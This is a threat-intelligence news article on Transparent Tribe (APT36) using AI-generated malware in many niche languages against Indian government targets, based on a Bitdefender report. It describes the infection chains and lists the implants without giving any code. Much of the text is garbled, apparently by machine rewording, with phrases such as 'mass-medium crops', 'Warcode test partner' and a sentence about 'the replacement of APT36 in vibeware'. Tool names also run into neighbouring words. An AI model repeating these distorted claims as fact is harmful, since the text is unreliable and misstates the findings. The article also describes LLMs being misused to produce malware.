Transparent Tribe Uses AI to Generate Malware Implants in Targeting Campaign in India
This threat actor associated with Pakistan is known as Transparent Tribe has become the latest hacking group to adopt artificial intelligence (AI)-powered writing tools to hit targets with various installations.
The work is designed to produce “high-volume, mass-medium crops” that are developed using little-known programming languages such as Nim, Zig, and Crystal and rely on trusted services such as Slack, Discord, Supabase, and Google Sheets to fly under the radar, according to new findings by Bitdefender.
“Instead of technological development, we are seeing a shift towards an AI-assisted malware industry that allows the actor to flood their target areas with disposable binaries, polyglots,” security researchers Radu Tudorica, Adrian Schipor, Victor Vrabie, Marius Baciu, and Martin Zugec said in a technical breakdown of the campaign.
The evolution towards malware, aka vibewareas a way to make it difficult to be discovered is characterized by a Romanian cybersecurity vendor as distributed denial of discovery (DDoD). In this way, the idea is not to bypass detection efforts by using complex technologies, but instead of flooding the target areas with disposable binaries, each using a different language and communication protocol.
Helping the threat actors in this aspect are the large language models (LLMs), which lower the barrier to cybercrime and close the technology gap by enabling them to generate functional code in non-standard languages, from scratch or by incorporating a core business concept from standard ones.
The latest set of attacks has been found to target the Indian government and its embassies in several foreign countries, with APT36 using LinkedIn to identify high-value targets. The attack also put the Afghan government and several private businesses in the spotlight, albeit to a lesser extent.
Infection chains may start with phishing emails with Windows shortcuts (LNKs) bundled inside ZIP archives or ISO images. Alternatively, PDF hijackers with a prominent “Download Document” button are used to redirect users to an attacker-controlled website that initiates downloads of similar ZIP archives.
Regardless of which method is used, the LNK file is used to execute PowerShell scripts in memory, then download and use the backdoor and facilitate post-compromise actions. This includes the deployment of popular adversary simulation tools such as Cobalt Strike and Havoc, which demonstrate a hybrid approach to ensuring resilience.
Some of the tools seen as part of the attack are listed below –
- The code of wara custom shellcode loader written in Crystal used to load the Havoc agent directly into memory.
- NimShellcodeLoadera Warcode test partner used to feed the embedded Cobalt Strike beacon.
- The CreepDropperNET malware used to deliver and install additional payloads, including SHEETCREEP, a Go-based infostealer that uses the Microsoft Graph API for C2, and MAILCREEP, a C#-based backdoor that uses Google Sheets for C2. Both malware families were described by Zscaler ThreatLabz in January 2026.
- SupaServa Rust-based backdoor that establishes a primary communication channel with the Supabase platform, Firebase serves as a backup. It contains Unicode emojis, suggesting it may have been developed using AI.
- The LuminousStealerpossibly vibe-coded, a Rust-based infostealer that uses Firebase and Google Drive to extract files with certain extensions (.txt, .docx, .pdf, .png, .jpg, .xlsx, .pptx, .zip, .rar, .doc, and .xls).
- CrystalShella backdoor written in Crystal that can target Windows, Linux, and macOS systems, and uses Discord channel IDs that are hard-coded into C2. It supports the ability to run commands and collect host information. One variant of the malware was found using Slack for C2.
- ZigShella CrystalShell counterpart written in Zig and uses Slack as its core C2 infrastructure. It also supports additional functionality to upload and download files.
- CrystalFilea simple command prompt written in Crystal that continuously monitors “C:UsersPublicAccountPicturesinput.txt” and executes the contents using “cmd.exe.”
- Bright Cookiesa special Rust-based injector for extracting cookies, passwords, and payment information from Chromium-based browsers by bypassing application-bound encryption.
- BackupSpya Rust-based utility designed to monitor local file systems and external media for high-value data.
- ZigLoadera special loader written in Zig that removes encryption and executes arbitrary shellcode in memory.
- Gate Sentinel Beacona customized version of the GateSentinel C2 open source framework project.
“The replacement of APT36 in vibeware represents a step down in technology,” Bitdefender said. “Although AI-assisted development increases sample capacity, the resulting tools are often unstable and full of logical errors. The actor’s strategy has misdirected signature-based detection, which has long been replaced by endpoint security.”
Bitdefender warned that the threat posed by AI-assisted malware is the industrialization of attacks, allowing threat actors to scale up their operations quickly and with little effort.
“We see the convergence of two trends that have been developing for a long time: the adoption of exotic languages, niche programming, and the abuse of trusted services to hide from legitimate network traffic,” the researchers said. “This combination allows mediocre code to achieve high operational success by simply bypassing standard defensive telemetry.”
